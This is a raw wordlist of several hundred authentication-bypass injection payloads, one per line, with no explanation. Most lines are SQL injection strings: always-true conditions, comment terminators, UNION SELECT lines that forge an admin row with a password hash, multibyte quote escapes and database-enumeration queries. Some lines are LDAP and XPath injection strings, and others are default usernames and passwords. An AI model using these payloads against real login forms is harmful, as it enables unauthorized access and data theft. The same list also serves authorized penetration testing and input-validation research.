"
" "
" #
" --
"&"
"&""#
"&""/*
")
") #
")&""#
")&""/*
")&("
")*""#
")*""/*
")*("
")-""#
")-""/*
")-("
")/*
")=""#
")=""/*
")=("
")^""#
")^""/*
")^("
"*"
"*""#
"*""/*
"-"
"-""#
"-""/*
"/*
"="
"=""#
"=""/*
"^"
"^""#
"^""/*
'
' #
' '
' --
' –
'#
'&'
'&''#
'&''/*
')
')#
')&''#
')&''/*
')&('
')*''#
')*''/*
')*('
')-''#
')-''/*
')-('
')/*
')=''#
')=''/*
')=('
')^''#
')^''/*
')^('
'*'
'*''#
'*''/*
'-'
'-''#
'-''/*
'--
'/*
'='
'=''#
'=''/*
'^'
'^''#
'^''/*
*
*)(&
*)(|(&
*)(|(*
=
==
*))%00
0"&lt;"2
0"&lt;"2"#
0"&lt;"2"/*
0")&lt;"2#
0")&lt;"2/*
0")&lt;("2
0'&lt;'2
0'&lt;'2'#
0'&lt;'2'/*
0')&lt;'2'#
0')&lt;'2'/*
0')&lt;('2
0"&lt;"2"-- 2
0")&lt;"2-- 2
0'&lt;'2'-- 2
0')&lt;'2'-- 2
'||1=1#@i.i
'||1=1#@qwery.com
1234
123456
1234 " AND 1=0 UNION ALL SELECT "admin", "7110eda4d09e062aa5e4a390b0a572ac0d2c0220
1234 ' AND 1=0 UNION ALL SELECT 'admin', '7110eda4d09e062aa5e4a390b0a572ac0d2c0220
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
1234 " AND 1=0 UNION ALL SELECT "admin@qwery.com", "7110eda4d09e062aa5e4a390b0a572ac0d2c0220
1234 ' AND 1=0 UNION ALL SELECT 'admin@qwery.com', '7110eda4d09e062aa5e4a390b0a572ac0d2c0220
1234 " AND 1=0 UNION ALL SELECT "admin@qwery.com", "81dc9bdb52d04dc20036dbd8313ed055
1234 ' AND 1=0 UNION ALL SELECT 'admin@qwery.com', '81dc9bdb52d04dc20036dbd8313ed055
1′) and '1′='1–
'"|\|/1#@i.i
'/|\|1#@i.i
'||1#@i.i
'"|\|/1#@qwery.com
'/|\|1#@qwery.com
'||1#@qwery.com
"&""-- 2
")&""-- 2
")*""-- 2
")-""-- 2
")-- 2
")=""-- 2
")^""-- 2
")||"2"||("
")||("2
")||2#
")||2/*
")||2||("
"*""-- 2
"-""-- 2
"-- 2
"=""-- 2
"^""-- 2
"||"2
"||"2"||"
"||2#
"||2/*
"||2||"
'&''-- 2
')&''-- 2
')*''-- 2
')-''-- 2
')-- 2
')=''-- 2
')^''-- 2
')||'2'||('
')||('2
')||2#
')||2/*
')||2||('
'*''-- 2
'-''-- 2
'-- 2
'=''-- 2
'^''-- 2
'||'2
'||'2'||'
'||2#
'||2/*
'||2||'
")||"2"="2"||("
")||"2"=("2
")||2-- 2
")||2=2#
")||2=2/*
")||2=2||("
"||"2"="2
"||"2"="2"||"
"||2-- 2
"||2=2#
"||2=2/*
"||2=2||"
')||'2'='2'||('
')||'2'=('2
')||2-- 2
')||2=2#
')||2=2/*
')||2=2||('
'||'2'='2
'||'2'='2'||'
'||2-- 2
'||2=2#
'||2=2/*
'||2=2||'
")||2=2-- 2
"||2=2-- 2
')||2=2-- 2
'||2=2-- 2
")||2=(2)LimIT(1)#
")||2=(2)LimIT(1)/*
"||2=(2)LimIT(1)#
"||2=(2)LimIT(1)/*
')||2=(2)LimIT(1)#
')||2=(2)LimIT(1)/*
'||2=(2)LimIT(1)#
'||2=(2)LimIT(1)/*
")||2=(2)LimIT(1)-- 2
"||2=(2)LimIT(1)-- 2
')||2=(2)LimIT(1)-- 2
'||2=(2)LimIT(1)-- 2
")||"2"LiKE"2"#
")||"2"LiKE"2"/*
")||"2"LiKE"2"||("
")||"2"LiKE("2
")||(2)LiKE(2)#
")||(2)LiKE(2)/*
")||(2)LiKE(2)||("
"||"2"LiKE"2
"||"2"LiKE"2"#
"||"2"LiKE"2"/*
"||"2"LiKE"2"||"
"||(2)LiKE(2)#
"||(2)LiKE(2)/*
"||(2)LiKE(2)||"
')||'2'LiKE'2'#
')||'2'LiKE'2'/*
')||'2'LiKE'2'||('
')||'2'LiKE('2
')||(2)LiKE(2)#
')||(2)LiKE(2)/*
')||(2)LiKE(2)||('
'||'2'LiKE'2
'||'2'LiKE'2'#
'||'2'LiKE'2'/*
'||'2'LiKE'2'||'
'||(2)LiKE(2)#
'||(2)LiKE(2)/*
'||(2)LiKE(2)||'
")||"2"LiKE"2"-- 2
")||(2)LiKE(2)-- 2
"||"2"LiKE"2"-- 2
"||(2)LiKE(2)-- 2
')||'2'LiKE'2'-- 2
')||(2)LiKE(2)-- 2
'||'2'LiKE'2'-- 2
'||(2)LiKE(2)-- 2
%8C%A8%27)||1-- 2
%8C%A8%27||1-- 2
%8C%A8%27 Or 1=1-- 2
%8C%A8%27) Or 1=1-- 2
%8C%A8%27 Or 1-- 2
%8C%A8%27)Or(1)-- 2
%8C%A8%27Or(1)-- 2
%8C%A8%27) Or 1-- 2
%A8%27)||1-- 2
%A8%27||1-- 2
%A8%27 Or 1=1-- 2
%A8%27) Or 1=1-- 2
%A8%27 Or 1-- 2
%A8%27)Or(1)-- 2
%A8%27Or(1)-- 2
%A8%27) Or 1-- 2
admin
admin" #
admin" --
admin"#
admin")#
admin"/*
admin' #
admin' --
admin'#
admin')#
admin')/*
admin'/*
admin)(!(&(|
admin)(&)
admin))(|(|
admin")-- 2
admin"-- 2
admin')-- 2
admin'-- 2
admin' and substring(password/text(),1,1)='7
admin' or '
admin" or "1"="1
admin" or "1"="1"#
admin" or "1"="1"--
admin" or "1"="1"/*
admin" or 1=1
admin" or 1=1#
admin" or 1=1--
admin" or 1=1/*
admin") or "1"="1
admin") or "1"="1"#
admin") or "1"="1"--
admin") or "1"="1"/*
admin") or ("1"="1
admin") or ("1"="1"#
admin") or ("1"="1"--
admin") or ("1"="1"/*
admin' or '1'='1
admin' or '1'='1'#
admin' or '1'='1'--
admin' or '1'='1'/*
admin' or 1=1
admin' or 1=1#
admin' or 1=1--
admin' or 1=1/*
admin') or '1'='1
admin') or '1'='1'#
admin') or '1'='1'--
admin') or '1'='1'/*
admin') or ('1'='1
admin') or ('1'='1'#
admin') or ('1'='1'--
admin') or ('1'='1'/*
admin"or 1=1 or ""="
admin'or 1=1 or ''='
admin' or '1'='2
admin@qwery.com" #
admin@qwery.com" --
admin@qwery.com"#
admin@qwery.com")#
admin@qwery.com"/*
admin@qwery.com' #
admin@qwery.com' --
admin@qwery.com'#
admin@qwery.com')#
admin@qwery.com')/*
admin@qwery.com'/*
admin@qwery.com)(!(&(|
admin@qwery.com)(&)
admin@qwery.com))(|(|
admin@qwery.com")-- 2
admin@qwery.com"-- 2
admin@qwery.com')-- 2
admin@qwery.com'-- 2
admin@qwery.com' and substring(password/text(),1,1)='7
admin@qwery.com' or '
admin@qwery.com" or "1"="1
admin@qwery.com" or "1"="1"#
admin@qwery.com" or "1"="1"--
admin@qwery.com" or "1"="1"/*
admin@qwery.com" or 1=1
admin@qwery.com" or 1=1#
admin@qwery.com" or 1=1--
admin@qwery.com" or 1=1/*
admin@qwery.com") or "1"="1
admin@qwery.com") or "1"="1"#
admin@qwery.com") or "1"="1"--
admin@qwery.com") or "1"="1"/*
admin@qwery.com") or ("1"="1
admin@qwery.com") or ("1"="1"#
admin@qwery.com") or ("1"="1"--
admin@qwery.com") or ("1"="1"/*
admin@qwery.com' or '1'='1
admin@qwery.com' or '1'='1'#
admin@qwery.com' or '1'='1'--
admin@qwery.com' or '1'='1'/*
admin@qwery.com' or 1=1
admin@qwery.com' or 1=1#
admin@qwery.com' or 1=1--
admin@qwery.com' or 1=1/*
admin@qwery.com') or '1'='1
admin@qwery.com') or '1'='1'#
admin@qwery.com') or '1'='1'--
admin@qwery.com') or '1'='1'/*
admin@qwery.com') or ('1'='1
admin@qwery.com') or ('1'='1'#
admin@qwery.com') or ('1'='1'--
admin@qwery.com') or ('1'='1'/*
admin@qwery.com"or 1=1 or ""="
admin@qwery.com'or 1=1 or ''='
admin@qwery.com' or '1'='2
" AND 1=0 UNION ALL SELECT "", "7110eda4d09e062aa5e4a390b0a572ac0d2c0220
' AND 1=0 UNION ALL SELECT '', '7110eda4d09e062aa5e4a390b0a572ac0d2c0220
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
' and 1='1
and 1=1
and 1=1–
' and a='a
' and 'one'='one
' and 'one'='one–
' and substring(password/text(),1,1)='7
%bf')||1-- 2
%bf'||1-- 2
%bf' Or 1=1 -- 2
%bf') Or 1=1 -- 2
%bf' Or 1-- 2
%bf') Or 1-- 2
%bf')Or(1)-- 2
%bf'Or(1)-- 2
'||'c'='c'#@i.i
'||'c'='c'#@qwery.com
ffifdyop
' group by password having 1=1--
' group by userid having 1=1--
' group by username having 1=1--
guest
'||''=''#@i.i
like '%'
" or "" "
" or ""&"
" or ""*"
" or ""-"
" or ""="
" or ""^"
' or '' '
' or ''&'
' or ''*'
' or ''-'
' or ''='
' or ''^'
'="or'
" or 0=0 #
" or 0=0 --
" or 0=0 –
%' or '0'='0
' or         0=0 #
' or 0=0 #
' or 0=0 --
' or 0=0 –
or 0=0 #
or 0=0 --
or 0=0 –
' or 1]%00
" or "1"="1
" or "1"="1"#
" or "1"="1"--
" or "1"="1"/*
" or 1=1
" or 1=1 --
" or 1=1 –
" or 1=1#
" or 1=1--
" or 1=1/*
" or 1=1–
") or "1"="1
") or "1"="1"#
") or "1"="1"--
") or "1"="1"/*
") or ("1"="1
") or ("1"="1"#
") or ("1"="1"--
") or ("1"="1"/*
' or '1'='1
' or '1'='1'#
' or '1'='1'--
' or '1'='1'/*
' or '1′='1
' or 1=1
' or 1=1 --
' or 1=1 –
' or 1=1#
' or 1=1--
' or 1=1/*
' or 1=1;#
' or 1=1–
') or '1'='1
') or '1'='1'#
') or '1'='1'--
') or '1'='1'/*
') or '1'='1--
') or ('1'='1
') or ('1'='1'#
') or ('1'='1'--
') or ('1'='1'/*
') or ('1'='1--
'or'1=1
'or'1=1′
) or '1′='1–
) or ('1′='1–
or 1=1
or 1=1#
or 1=1--
or 1=1/*
or 1=1–
'OR'1'='1'#@i.i
' or 1=1 limit 1 -- -+
' or 1=1 LIMIT 1;#
"or 1=1 or ""="
'or 1=1 or ''='
'OR'1'='1'#@qwery.com
' or 1 or '
")oR 2#
")oR 2/*
")oR"2"#
")oR"2"/*
")oR("2
")oR(2)#
")oR(2)/*
")oR/**/2#
")oR/**/2/*
"oR 2#
"oR 2/*
"oR"2
"oR"2"#
"oR"2"/*
"oR(2)#
"oR(2)/*
"oR/**/2#
"oR/**/2/*
')oR 2#
')oR 2/*
')oR'2'#
')oR'2'/*
')oR('2
')oR(2)#
')oR(2)/*
')oR/**/2#
')oR/**/2/*
'oR 2#
'oR 2/*
'oR'2
'oR'2'#
'oR'2'/*
'oR(2)#
'oR(2)/*
'oR/**/2#
'oR/**/2/*
")oR 2-- 2
")oR 2=2#
")oR 2=2/*
")oR"2"-- 2
")oR"2"="2"#
")oR"2"="2"/*
")oR"2"=("2
")oR(2)-- 2
")oR(2)=2#
")oR(2)=2/*
")oR/**/2-- 2
")oR/**/2=2#
")oR/**/2=2/*
"oR 2-- 2
"oR 2=2#
"oR 2=2/*
"oR"2"-- 2
"oR"2"="2
"oR"2"="2"#
"oR"2"="2"/*
"oR(2)-- 2
"oR(2)=2#
"oR(2)=2/*
"oR/**/2-- 2
"oR/**/2=2#
"oR/**/2=2/*
')oR 2-- 2
')oR 2=2#
')oR 2=2/*
')oR'2'-- 2
')oR'2'='2'#
')oR'2'='2'/*
')oR'2'=('2
')oR(2)-- 2
')oR(2)=2#
')oR(2)=2/*
')oR/**/2-- 2
')oR/**/2=2#
')oR/**/2=2/*
'oR 2-- 2
'oR 2=2#
'oR 2=2/*
'oR'2'-- 2
'oR'2'='2
'oR'2'='2'#
'oR'2'='2'/*
'oR(2)-- 2
'oR(2)=2#
'oR(2)=2/*
'oR/**/2-- 2
'oR/**/2=2#
'oR/**/2=2/*
")oR 2=2-- 2
")oR"2"="2"-- 2
")oR(2)=2-- 2
")oR/**/2=2-- 2
"oR 2=2-- 2
"oR"2"="2"-- 2
"oR(2)=2-- 2
"oR/**/2=2-- 2
')oR 2=2-- 2
')oR'2'='2'-- 2
')oR(2)=2-- 2
')oR/**/2=2-- 2
'oR 2=2-- 2
'oR'2'='2'-- 2
'oR(2)=2-- 2
'oR/**/2=2-- 2
")oR(2)=(2)LimIT(1)#
")oR(2)=(2)LimIT(1)/*
"oR(2)=(2)LimIT(1)#
"oR(2)=(2)LimIT(1)/*
')oR(2)=(2)LimIT(1)#
')oR(2)=(2)LimIT(1)/*
'oR(2)=(2)LimIT(1)#
'oR(2)=(2)LimIT(1)/*
")oR"2"="2" LimIT 1#
")oR"2"="2" LimIT 1/*
"oR"2"="2" LimIT 1#
"oR"2"="2" LimIT 1/*
')oR'2'='2' LimIT 1#
')oR'2'='2' LimIT 1/*
'oR'2'='2' LimIT 1#
'oR'2'='2' LimIT 1/*
")oR(2)=(2)LimIT(1)-- 2
"oR(2)=(2)LimIT(1)-- 2
')oR(2)=(2)LimIT(1)-- 2
'oR(2)=(2)LimIT(1)-- 2
")oR"2"="2" LimIT 1-- 2
"oR"2"="2" LimIT 1-- 2
')oR'2'='2' LimIT 1-- 2
'oR'2'='2' LimIT 1-- 2
")oR 2=2 oR("
")oR"2"="2"oR("
")oR(2)=(2)oR("
"oR 2=2 oR"
"oR"2"="2"oR"
"oR(2)=(2)oR"
')oR 2=2 oR('
')oR'2'='2'oR('
')oR(2)=(2)oR('
'oR 2=2 oR'
'oR'2'='2'oR'
'oR(2)=(2)oR'
")oR/**/2=2/**/oR("
"oR/**/2=2/**/oR"
')oR/**/2=2/**/oR('
'oR/**/2=2/**/oR'
")oR"2"LiKE"2"#
")oR"2"LiKE"2"/*
")oR"2"LiKE("2
")oR(2)LiKE(2)#
")oR(2)LiKE(2)/*
"oR"2"LiKE"2
"oR"2"LiKE"2"#
"oR"2"LiKE"2"/*
"oR(2)LiKE(2)#
"oR(2)LiKE(2)/*
')oR'2'LiKE'2'#
')oR'2'LiKE'2'/*
')oR'2'LiKE('2
')oR(2)LiKE(2)#
')oR(2)LiKE(2)/*
'oR'2'LiKE'2
'oR'2'LiKE'2'#
'oR'2'LiKE'2'/*
'oR(2)LiKE(2)#
'oR(2)LiKE(2)/*
")oR"2"LiKE"2"-- 2
")oR(2)LiKE(2)-- 2
"oR"2"LiKE"2"-- 2
"oR(2)LiKE(2)-- 2
')oR'2'LiKE'2'-- 2
')oR(2)LiKE(2)-- 2
'oR'2'LiKE'2'-- 2
'oR(2)LiKE(2)-- 2
")oR"2"LiKE"2"oR("
")oR(2)LiKE(2)oR("
"oR"2"LiKE"2"oR"
"oR(2)LiKE(2)oR"
')oR'2'LiKE'2'oR('
')oR(2)LiKE(2)oR('
'oR'2'LiKE'2'oR'
'oR(2)LiKE(2)oR'
")oR 2 oR("
")oR"2"oR("
")oR(2)oR("
"oR 2 oR"
"oR"2"oR"
"oR(2)oR"
')oR 2 oR('
')oR'2'oR('
')oR(2)oR('
'oR 2 oR'
'oR'2'oR'
'oR(2)oR'
")oR/**/2/**/oR("
"oR/**/2/**/oR"
')oR/**/2/**/oR('
'oR/**/2/**/oR'
" or "a"="a
") or ("a"="a
' or a=a--
' or a=a–
') or ('a'='a and hi") or ("a"="a
'=' 'or' and '=' 'or'
' or "a" or '
'or contains(.,'adm') or'
'or contains(name,'adm') or'
'\O/R'\'/=\'/'#@i.i
'OR''=''#@i.i
' or 'one'='one
' or 'one'='one–
' or /* or '
'or position()=2 or'
'\O/R'\'/=\'/'#@qwery.com
'OR''=''#@qwery.com
'or string-length(name(.))<10 or'
" or true--
") or true--
' or true--
') or true--
or true
or true--
")oR true#
")oR true/*
")oR(true)#
")oR(true)/*
")oR/**/true#
")oR/**/true/*
"oR true#
"oR true/*
"oR(true)#
"oR(true)/*
"oR/**/true#
"oR/**/true/*
')oR true#
')oR true/*
')oR(true)#
')oR(true)/*
')oR/**/true#
')oR/**/true/*
'oR true#
'oR true/*
'oR(true)#
'oR(true)/*
'oR/**/true#
'oR/**/true/*
")oR true-- 2
")oR(true)-- 2
")oR/**/true-- 2
"oR true-- 2
"oR(true)-- 2
"oR/**/true-- 2
')oR true-- 2
')oR(true)-- 2
')oR/**/true-- 2
'oR true-- 2
'oR(true)-- 2
'oR/**/true-- 2
' or true() or '
")oR true oR("
")oR(true)oR("
")oR/**/true/**/oR("
"oR true oR"
"oR(true)oR"
"oR/**/true/**/oR"
')oR true oR('
')oR(true)oR('
')oR/**/true/**/oR('
'oR true oR'
'oR(true)oR'
'oR/**/true/**/oR'
' or uid like '%
' or uname like '%
' or userid like '%
' or user like '%
' or username like '%
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
' or 'x'='x
') or ('x')=('x
') or ('x'='x
')) or (('x'))=(('x
' OR 'x'='x'#;
Pass1234.
Pass1234." AND 1=0 UniON ALL SeleCT "admin", md5("Pass1234.
Pass1234." AND 1=0 UniON ALL SeleCT "admin", md5("Pass1234.")#
Pass1234.' AND 1=0 UniON ALL SeleCT 'admin', md5('Pass1234.
Pass1234.' AND 1=0 UniON ALL SeleCT 'admin', md5('Pass1234.')#
Pass1234." AND 1=0 UniON ALL SeleCT "admin@qwery.com", md5("Pass1234.
Pass1234." AND 1=0 UniON ALL SeleCT "admin@qwery.com", md5("Pass1234.")#
Pass1234.' AND 1=0 UniON ALL SeleCT 'admin@qwery.com', md5('Pass1234.
Pass1234.' AND 1=0 UniON ALL SeleCT 'admin@qwery.com', md5('Pass1234.')#
Pass1234." AND 1=0 UniON SeleCT "admin", "5b19a9e947ca0fee49995f2a8b359e1392adbb61
Pass1234." AND 1=0 UniON SeleCT "admin", "5b19a9e947ca0fee49995f2a8b359e1392adbb61"#
Pass1234.' AND 1=0 UniON SeleCT 'admin', '5b19a9e947ca0fee49995f2a8b359e1392adbb61
Pass1234.' AND 1=0 UniON SeleCT 'admin', '5b19a9e947ca0fee49995f2a8b359e1392adbb61'#
Pass1234." AND 1=0 UniON SeleCT "admin", "fe1ff105bf807478a217ad4e378dc658
Pass1234." AND 1=0 UniON SeleCT "admin", "fe1ff105bf807478a217ad4e378dc658"#
Pass1234.' AND 1=0 UniON SeleCT 'admin', 'fe1ff105bf807478a217ad4e378dc658
Pass1234.' AND 1=0 UniON SeleCT 'admin', 'fe1ff105bf807478a217ad4e378dc658'#
Pass1234." AND 1=0 UniON SeleCT "admin@qwery.com", "5b19a9e947ca0fee49995f2a8b359e1392adbb61
Pass1234." AND 1=0 UniON SeleCT "admin@qwery.com", "5b19a9e947ca0fee49995f2a8b359e1392adbb61"#
Pass1234.' AND 1=0 UniON SeleCT 'admin@qwery.com', '5b19a9e947ca0fee49995f2a8b359e1392adbb61
Pass1234.' AND 1=0 UniON SeleCT 'admin@qwery.com', '5b19a9e947ca0fee49995f2a8b359e1392adbb61'#
Pass1234." AND 1=0 UniON SeleCT "admin@qwery.com", "fe1ff105bf807478a217ad4e378dc658
Pass1234." AND 1=0 UniON SeleCT "admin@qwery.com", "fe1ff105bf807478a217ad4e378dc658"#
Pass1234.' AND 1=0 UniON SeleCT 'admin@qwery.com', 'fe1ff105bf807478a217ad4e378dc658
Pass1234.' AND 1=0 UniON SeleCT 'admin@qwery.com', 'fe1ff105bf807478a217ad4e378dc658'#
Pass1234." and 1=0 union select "admin@qwery.com",sha("Pass1234.
Pass1234." and 1=0 union select "admin@qwery.com",sha("Pass1234.")#
Pass1234.' and 1=0 union select 'admin@qwery.com',sha('Pass1234.
Pass1234.' and 1=0 union select 'admin@qwery.com',sha('Pass1234.')#
Pass1234." and 1=0 union select "admin",sha("Pass1234.
Pass1234." and 1=0 union select "admin",sha("Pass1234.")#
Pass1234.' and 1=0 union select 'admin',sha('Pass1234.
Pass1234.' and 1=0 union select 'admin',sha('Pass1234.')#
password
pwd
pwd)
pwd))
'||''=''#@qwery.com
root
test
toor
")||true#
")||true/*
")||true||("
"||true#
"||true/*
"||true||"
')||true#
')||true/*
')||true||('
'||true#
'||true/*
'||true||'
")||true-- 2
"||true-- 2
')||true-- 2
'||true-- 2
' UNION ALL SELECT 1, @@version;#
' UNION ALL SELECT system_user(),user();#
" UniON SElecT 1,2#
") UniON SElecT 1,2#
")UniON(SElecT(1),2)#
"UniON(SElecT(1),2)#
' UniON SElecT 1,2#
') UniON SElecT 1,2#
')UniON(SElecT(1),2)#
'UniON(SElecT(1),2)#
" UnION SELeCT 1,2`
' UnION SELeCT 1,2`
" UniON SElecT 1,2-- 2
") UniON SElecT 1,2-- 2
")UniON(SElecT(1),2)-- 2
"UniON(SElecT(1),2)-- 2
' UniON SElecT 1,2-- 2
') UniON SElecT 1,2-- 2
')UniON(SElecT(1),2)-- 2
'UniON(SElecT(1),2)-- 2
" UniON SElecT 1,2,3#
") UniON SElecT 1,2,3#
")UniON(SElecT(1),2,3)#
"UniON(SElecT(1),2,3)#
' UniON SElecT 1,2,3#
') UniON SElecT 1,2,3#
')UniON(SElecT(1),2,3)#
'UniON(SElecT(1),2,3)#
" UnION SELeCT 1,2,3`
' UnION SELeCT 1,2,3`
" UniON SElecT 1,2,3-- 2
") UniON SElecT 1,2,3-- 2
")UniON(SElecT(1),2,3)-- 2
"UniON(SElecT(1),2,3)-- 2
' UniON SElecT 1,2,3-- 2
') UniON SElecT 1,2,3-- 2
')UniON(SElecT(1),2,3)-- 2
'UniON(SElecT(1),2,3)-- 2
" UniON SElecT 1,2,3,4#
") UniON SElecT 1,2,3,4#
")UniON(SElecT(1),2,3,4)#
"UniON(SElecT(1),2,3,4)#
' UniON SElecT 1,2,3,4#
') UniON SElecT 1,2,3,4#
')UniON(SElecT(1),2,3,4)#
'UniON(SElecT(1),2,3,4)#
" UnION SELeCT 1,2,3,4`
' UnION SELeCT 1,2,3,4`
" UniON SElecT 1,2,3,4-- 2
") UniON SElecT 1,2,3,4-- 2
")UniON(SElecT(1),2,3,4)-- 2
"UniON(SElecT(1),2,3,4)-- 2
' UniON SElecT 1,2,3,4-- 2
') UniON SElecT 1,2,3,4-- 2
')UniON(SElecT(1),2,3,4)-- 2
'UniON(SElecT(1),2,3,4)-- 2
" UniON SElecT 1,2,3,4,5#
") UniON SElecT 1,2,3,4,5#
")UniON(SElecT(1),2,3,4,5)#
"UniON(SElecT(1),2,3,4,5)#
' UniON SElecT 1,2,3,4,5#
') UniON SElecT 1,2,3,4,5#
')UniON(SElecT(1),2,3,4,5)#
'UniON(SElecT(1),2,3,4,5)#
" UnION SELeCT 1,2,3,4,5`
' UnION SELeCT 1,2,3,4,5`
" UniON SElecT 1,2,3,4,5-- 2
") UniON SElecT 1,2,3,4,5-- 2
")UniON(SElecT(1),2,3,4,5)-- 2
"UniON(SElecT(1),2,3,4,5)-- 2
' UniON SElecT 1,2,3,4,5-- 2
') UniON SElecT 1,2,3,4,5-- 2
')UniON(SElecT(1),2,3,4,5)-- 2
'UniON(SElecT(1),2,3,4,5)-- 2
' UNION select table_schema,table_name FROM information_Schema.tables;#
